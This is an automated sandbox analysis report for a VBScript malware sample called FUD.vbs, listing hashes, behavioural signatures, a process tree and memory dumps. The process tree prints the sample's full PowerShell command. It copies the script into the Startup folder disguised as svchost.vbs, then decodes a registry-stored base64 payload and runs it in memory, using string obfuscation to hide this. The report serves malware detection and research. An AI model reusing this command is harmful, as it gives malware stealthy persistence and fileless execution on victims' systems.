Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2025, 15:40

General

  • Target

    FUD.vbs

  • Size

    325KB

  • MD5

    d525be35ac5b7de70edb7c00529f1d83

  • SHA1

    eef5cd4c355487132d225492acdc425fb0fe606d

  • SHA256

    f9f35704de5a2355e9b8b7107613736b5501573cfb9794126867ccd73100ea98

  • SHA512

    32e399504a0669e0c83872a947cf24955489f2b3f75dae83cec2798681f4249d6bac02f861436fcbf6b8d2321045ab7fbc6c006bf33ca1402429ce799e254830

  • SSDEEP

    6144:PAbSQwEhvxxx06qUY2fVHavDdl8PI76KF51u7WJVzZF:PAbBlhqp2fZsDdlYI77BVlF

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; $roadtest = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $roadtest = -join $roadtest[-1..-$roadtest.Length];[<##>AppDomain<##>]::<##>('seaserviceurrentDomain'.replace('seaservice','C'))<##>.<##>('digeneticoad'.replace('digenetic','L'))([Convert]::FromBase64String($roadtest))<##>.<##>('estocsntryPoint'.replace('estocs','E'))<##>.<##>('Instolonoke'.replace('stolon','v'))($Null,$Null)<##>;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2400

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2400-4-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

    Filesize

    4KB

  • memory/2400-5-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2400-6-0x0000000002910000-0x0000000002918000-memory.dmp

    Filesize

    32KB

  • memory/2400-7-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

  • memory/2400-8-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

  • memory/2400-9-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

  • memory/2400-10-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

  • memory/2400-11-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

  • memory/2400-12-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

  • memory/2400-13-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

    Filesize

    4KB